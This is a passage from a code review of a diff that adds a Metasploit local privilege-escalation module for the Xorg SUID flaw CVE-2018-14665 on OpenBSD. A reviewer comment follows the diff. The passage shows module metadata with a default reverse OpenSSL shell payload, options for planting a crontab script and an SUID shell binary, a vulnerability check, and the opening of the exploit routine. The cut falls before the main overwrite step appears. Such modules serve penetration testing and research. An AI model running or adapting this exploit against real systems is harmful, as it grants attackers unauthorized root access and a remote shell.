modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,171 @@
+        will run a small script to launch an executable. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+
+      'DisclosureDate' => 'Oct 25 2018',
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell', #Shell is needed to start Xorg in Linux
+      'Targets'        =>
+         [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+          ],
+      'DefaultOptions' =>
+         {
+             'Target'  => '0',
+             'PAYLOAD' => 'cmd/unix/reverse_openssl'
+         },
+      'References'     =>
+         [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+         ]
+    ))
+    register_options(
+      [
+        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
+      ])
+  end
+
+
+  def check
+    xorg_path = cmd_exec("which Xorg")
+    vprint_good "Xorg path found at #{xorg_path}"
+    if setuid? xorg_path
+      vprint_good "Xorg binary detected as SUID"
+      proc_list = []
+      proc_list = cmd_exec('ps ax')
+      if proc_list.include?("X")
+        vprint_warning("Xorg in process list, Can you stop it? ")
+        return CheckCode::Safe
+      else
+        vprint_good("Xorg does not appear running")
+        return CheckCode::Appears
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Appears
+       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = "#{datastore['BUILTIN']}"
+    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    payload_c = "#{pscript}.c"
+
+    # Universal stub for file crontab will run
+    cmd_exec "echo '#!/bin/sh' > #{pscript}"
+    cmd_exec "chmod +x #{pscript}"
```

Comment:
There is a `chmod` method in `Msf::Post::File` if you'd like to use it. Only octal is supported at the moment, but the permissions default to `0700`.